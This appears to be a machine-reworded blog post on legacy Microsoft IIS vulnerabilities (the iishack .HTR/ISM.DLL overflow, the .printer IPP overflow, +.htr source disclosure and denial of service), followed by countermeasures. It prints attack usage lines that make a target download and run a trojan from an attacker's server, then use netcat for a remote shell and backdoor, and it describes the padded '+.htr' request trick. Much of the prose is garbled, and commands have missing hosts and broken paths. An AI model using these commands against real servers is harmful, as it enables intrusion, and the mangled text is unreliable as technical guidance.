iishack.exe overflows a buffer used by IIS http daemon, permitting arbitrary code to get executed.
c: iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com may be the IIS server you're hacking, 80 may be the port its listening on, www.yourserver.com is a webserver using your trojan or custom script (your individual, or any other), and /thetrojan.exe is the road to that script.
"IIS Hack" can be a buffer overflow vulnerability exposed mind you IIS handles requests with .HTR extensions. A hacker sends a lengthy URL that ends with ".HTR". IIS interprets becoming data form of HTR and invokes the ISM.DLL to handle request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. As an example, it is relatively simple relating to the exploit code a sequence of commands which will open a TCP/IP connection, download an executable after which execute it. By doing this, any malicious code can be executed.
A sample exploit could be constructed as shown below:
To break into the objective site and attacker's system owning a web server will use iishack.exe and ncx.exe.
In the first place, the ncx.exe is configured to own in the root directory. IIShack.exe might be run up against the victim site.
c:>iishack.exe 80 /ncx.exe The attacker can then use netcat to evoke the command shell
c:>nc 80 They can go on to upload and execute any code of his choice and gaze after a backdoor on the target site.
- Install latest service pack from Microsoft.
- Remove IPP printing from IIS Server
- Install firewall and take away unused extensions
- Implement aggressive network egress filtering
- Use IISLockdown and URLScan utilities
- Regularly scan your network for vulnerable servers
Without the further explanation, the initial countermeasure is undoubtedly to setup the most recent service packs and hotfixes.
Much like many IIS vulnerabilities, the IPP exploit uses a bug within an ISAPI DLL that ships with IIS 5 which is configured automagically to deal with requests for several file types. This particular ISAPI filter resides in C: WINNTSystem32msw3prt.dll and supplies Windows 2000 with support for your IPP. If this type of functionality is not needed on the internet server, the approval mapping with this DLL to .printer files are easy to remove (and optionally deleting the DLL itself) in order to avoid the buffer overflow from being exploited. You could do this for the reason that DLL will never be loaded in the IIS process if this starts up. In reality, most security issues are devoted to the ISAPI DLL mappings, causeing this to be one of the most important countermeasure to get adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and take away any extensions which aren't required. Implementing aggressive network egress might help to some extent.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and reduce damage should the web server is affected.
Microsoft has also released a patch for your buffer overflow, but detaching the ISAPI DLL can be a more proactive solution in case there are additional vulnerabilities which might be to be found with all the code.
- Microsoft IIS 4. and 5. can be achieved to reveal fragments of source code that ought to preferably be in accessible.
- This is accomplished by appending "+.htr" to some get a known .asp (or .asa, .ini, etc) file.
- appending this string causes the request to get handled by ISM.DLL, which strips the '+.htr' string and may even disclose part or each of the source of the .asp file per the request.
IIS supports several file types that require server-side processing. When a web site visitor requests data of one of them types, a proper filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to get provided via IIS web servers. Windows NT users will use .HTR scripts to alter their particular passwords, and administrators will use them to perform several password administration functions. HTR can be a first-generation advanced scripting technology which is included in IIS 3., yet still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4..
| Attack Methods | Exploit / Attack Methodology By looking into making a specifically formed request to IIS, with the file after which appending around 230 + " %20 " (these represents spaces) after which appending " .htr " this tricks IIS into believing that the client is requesting a " .htr " file . The .htr file extension is mapped on the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL. |
ISM.DLL might be passed the file to open up and execute to start with doing this ISM.DLL truncates the buffer sent to it chopping over .htr and several spaces and ends up opening the file whose source is sought. The contents are then returned. This attack are only able to be launched once though, unless the world wide web service started and stopped. It's going to only work when ISM.DLL first loaded into memory.
"Undelimited .HTR Request" vulnerability: The first vulnerability can be a denial of service vulnerability. All .HTR files accept certain parameters which might be likely to be delimited in a very particular way. This vulnerability exists for the reason that search routine for your delimiter isn't properly bounded. Thus, if your malicious user provided a request with no expected delimiter, the ISAPI filter that processes it could search forever for your delimiter and never find it.
If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly correctly. This could steer clear of the server from servicing any further password change requests. In addition, the search would consume CPU time, hence the overall response in the server might be slowed.
The second threat can be tougher to use. A carefully-constructed file request could cause arbitrary code to complete on the server by way of a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability doesn't involve the functionality in the password administration options that come with .HTR files.
".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of some types of files to get read by giving a malformed request that would increase the risk for. HTR processing to apply to them. This vulnerability could allow a malicious user to learn some types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will endeavor to interpret the requested file just as one .HTR file, this also would have the effect of removing virtually everything but text from your selected file. That is, it could have the effect of stripping the very information that is usually to contain sensitive information in .asp and other server-side files.
The .htr vulnerability allows data to get added, deleted or changed on the server, or allow any administrative control on the server to get usurped. Although .HTR files are employed to allow web-based password administration, this vulnerability doesn't involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3. (and preserved on upgrade to IIS 4. and IIS 5.) were several that allowed web site administrators to look at directories on the server. One of these brilliant scripts, if called without an expected argument, will enter an infinite loop that could consume each of the system's CPU availability, thereby preventing the server from responding to requests for service.
No comments:
Post a Comment